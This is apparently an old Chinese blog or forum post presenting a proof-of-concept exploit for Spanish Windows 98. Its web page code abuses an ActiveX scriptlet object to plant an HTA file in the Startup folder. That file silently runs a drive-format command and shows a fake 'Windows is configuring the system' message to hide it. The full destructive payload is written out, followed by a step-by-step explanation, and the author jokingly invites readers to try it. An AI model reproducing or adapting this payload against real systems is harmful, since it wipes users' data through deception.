先前的文章我们解释了hta(HTML application)在Web页面中是怎么在别人
访问站点的时候攻击你的机器。现在，又有了个新的危险的例子，但这个例子
里，攻击的对象只是作者自己，千万不要拿别人的宝贝机器来做你的实验品,用
下面的代码（注意，这些代码是For Spanish Windows98.要想让它在中文或是
英文版本下运行，得做写改动，具体得自己动手啦）


　　$#@60;object id="scr"
　　classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"$#@62;
　　$#@60;/object$#@62;
　　$#@60;SCRIPT$#@62;
　　scr.Reset();
　　scr.Path="C:windowsMen?inicioProgramasInicioautomat.hta";
　　scr.Doc="$#@60;object id=wsh
　classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B$#@62;$#@60;/object$#@62;
$#@60;SCRIPT$#@62;
wsh.Run(start /m format a: /q /autotest /u); alert(IMPORTANT :
Windows is configuring the system. Plase do not interrupt this
process.);$#@60;/"+"SCRIPT$#@62;";
　　scr.write();

　　代码的作者就把自己的D:, A:给格式化了，我嘛，还不敢试，哪位大哥够
量的就帮小弟玩玩。
　　这个代码是按如下工作的：
　　1) 用start /m (Spanish Win98 版本)，这个程序以最小化的方式运行，所
以用户不大会发现到。
　　2) 用上参数 /autotest,它可能会在某个驱动器上自动运行Format.com
(不会问你Y/N的哦)
　　3) 接着，就会有提示的message告诉你，"IMPORTANT : Windows is
configuring the system. Please do not interrupt this process."
　　这些都会隐藏最小化窗口里的Format信息。当然，它也会因为这个程序而会
被发现。
　　很明显，这个漏洞是很危险的。想想你的drive里的好东东一下都没了，
呵呵，哭也来不及了。